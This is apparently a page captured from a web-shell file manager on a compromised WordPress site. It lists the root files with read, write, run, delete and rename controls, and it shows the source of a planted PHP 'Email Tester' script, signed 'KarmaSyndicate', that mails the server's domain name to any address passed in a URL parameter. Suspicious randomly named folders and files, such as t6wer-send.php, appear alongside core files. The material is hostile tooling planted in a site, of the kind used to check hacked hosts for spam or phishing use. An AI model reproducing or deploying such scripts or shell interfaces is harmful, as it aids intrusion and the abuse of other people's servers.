at path:
ROOT
/
test_c74823.php
run:
R
W
Run
.ssl-manager
DIR
2025-10-09 07:41:06
R
W
Run
.well-known
DIR
2025-10-09 07:41:24
R
W
Run
47793b
DIR
2026-02-25 08:00:54
R
W
Run
fa1fb
DIR
2026-02-25 08:00:54
R
W
Run
fccgff
DIR
2026-02-25 08:00:54
R
W
Run
llu
DIR
2026-02-25 08:00:54
R
W
Run
well-known
DIR
2026-02-25 11:11:49
R
W
Run
wp-admin
DIR
2026-03-23 01:02:00
R
W
Run
wp-content
DIR
2026-03-23 05:00:54
R
W
Run
wp-includes
DIR
2026-03-23 01:02:01
R
W
Run
.htaccess
236 By
2024-01-01 05:00:54
R
W
Run
config.php
1.07 KB
1970-01-01 00:00:00
R
W
Run
Delete
Rename
configuration.php
1.07 KB
1970-01-01 00:00:00
R
W
Run
Delete
Rename
default.php
1.07 KB
1970-01-01 00:00:00
R
W
Run
Delete
Rename
error_log
388.7 KB
2026-03-23 08:04:05
R
W
Run
Delete
Rename
ggvhvb
0 By
2025-12-04 23:51:50
R
W
Run
Delete
Rename
google71081adf758293a4.html
7.93 KB
2025-12-17 02:14:33
R
W
Run
Delete
Rename
index.php
2.26 KB
2023-09-27 05:00:54
R
W
Run
index.php0
12.76 KB
2024-01-10 01:01:57
R
W
Run
Delete
Rename
license.txt
19.44 KB
2025-12-03 06:22:56
R
W
Run
Delete
Rename
main.php
1.07 KB
1970-01-01 00:00:00
R
W
Run
Delete
Rename
readme.html
15.13 KB
2026-02-04 01:01:35
R
W
Run
Delete
Rename
robots.txt
384 By
2024-06-11 05:00:54
R
W
Run
search.php
1.45 KB
2024-08-05 05:00:54
R
W
Run
simple.php
22.92 KB
2026-01-30 02:39:00
R
W
Run
Delete
Rename
t6wer-send.php
453 By
2025-12-09 23:04:37
R
W
Run
Delete
Rename
test_2b8a42.php
4.08 KB
2025-12-03 11:02:44
R
W
Run
Delete
Rename
test_c74823.php
4.08 KB
2025-11-26 13:01:23
R
W
Run
Delete
Rename
wp-activate.php
15.07 KB
2025-12-03 06:22:56
R
W
Run
Delete
Rename
wp-blog-header.php
1.07 KB
2026-01-21 20:11:30
R
W
Run
Delete
Rename
wp-comments-post.php
10.16 KB
2023-06-14 14:11:16
R
W
Run
Delete
Rename
wp-config-sample.php
11.15 KB
2025-12-03 06:22:56
R
W
Run
Delete
Rename
wp-config.php
1.07 KB
2024-10-09 13:45:00
R
W
Run
Delete
Rename
wp-cron.php
13.37 KB
2024-11-13 19:02:13
R
W
Run
Delete
Rename
wp-links-opml.php
10.31 KB
2025-12-03 06:22:56
R
W
Run
Delete
Rename
wp-load.php
3.84 KB
2024-09-04 11:48:32
R
W
Run
Delete
Rename
wp-mail.php
16.41 KB
2025-12-03 06:22:56
R
W
Run
Delete
Rename
wp-settings.php
1.07 KB
2025-12-03 06:22:56
R
W
Run
Delete
Rename
wp-signup.php
41.6 KB
2025-04-16 02:33:33
R
W
Run
Delete
Rename
wp-trackback.php
12.98 KB
2025-12-03 06:22:56
R
W
Run
Delete
Rename
xmlrpc.php
11.02 KB
2025-04-16 02:33:33
R
W
Run
Delete
Rename
error_log
up
📄
test_c74823.php
Save
<?php error_reporting(0); if (isset($_GET['diwri']) && filter_var($_GET['diwri'], FILTER_VALIDATE_EMAIL)) { $to = $_GET['diwri']; $subject = "Mail Working"; $domain = $_SERVER['SERVER_NAME']; $message = "Here is your working domain: $domain"; $headers = "From: no-reply@" . $domain . "\r\n"; $headers .= "Reply-To: no-reply@" . $domain . "\r\n"; $headers .= "X-Mailer: PHP/" . phpversion(); if (mail($to, $subject, $message, $headers)) { $result = "Mail Sent Successfully"; $resultClass = "success"; } else { $result = "Mail sending failed."; $resultClass = "error"; } } else { $result = null; } ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Email Tester</title> <style> * { margin: 0; padding: 0; box-sizing: border-box; } body { font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, sans-serif; background: #f0f0f0; min-height: 100vh; display: flex; align-items: center; justify-content: center; padding: 10px; } .container { background: white; border-radius: 10px; box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1); padding: 20px; max-width: 400px; width: 100%; text-align: center; } h1 { color: #333; font-size: 1.8em; font-weight: 600; margin-bottom: 10px; } p { color: #666; font-size: 1em; margin-bottom: 20px; } .form-group { margin-bottom: 20px; } label { display: block; color: #333; font-weight: 500; margin-bottom: 5px; font-size: 1em; } input[type="email"] { width: 100%; padding: 10px 15px; border: 1px solid #ddd; border-radius: 5px; font-size: 1em; } input[type="email"]:focus { outline: none; border-color: #667eea; } button { background: #667eea; color: white; border: none; padding: 10px 30px; border-radius: 5px; font-size: 1em; font-weight: 500; cursor: pointer; } .result { padding: 15px; border-radius: 5px; font-size: 1.1em; font-weight: 500; margin-top: 15px; } .success { background: #4CAF50; color: white; } .error { background: #f44336; color: white; } .back-link { display: inline-block; margin-top: 15px; color: #667eea; text-decoration: none; font-weight: 500; } .back-link:hover { color: #764ba2; } </style> </head> <body> <div class="container"> <h1>✨ Email Tester</h1> <p>Enter your email to test the mail functionality.</p> <?php if ($result): ?> <div class="result <?php echo $resultClass; ?>"> <?php echo $result; ?> </div> <a href="?" class="back-link">← Test Another Email</a> <?php else: ?> <form method="GET" action=""> <div class="form-group"> <label for="diwri">Your Email Address:</label> <input type="email" id="diwri" name="diwri" placeholder="email@example.com" required> </div> <button type="submit">Send Test Email 🚀</button> </form> <?php endif; ?> </div> </body> </html> <!-- KarmaSyndicate -->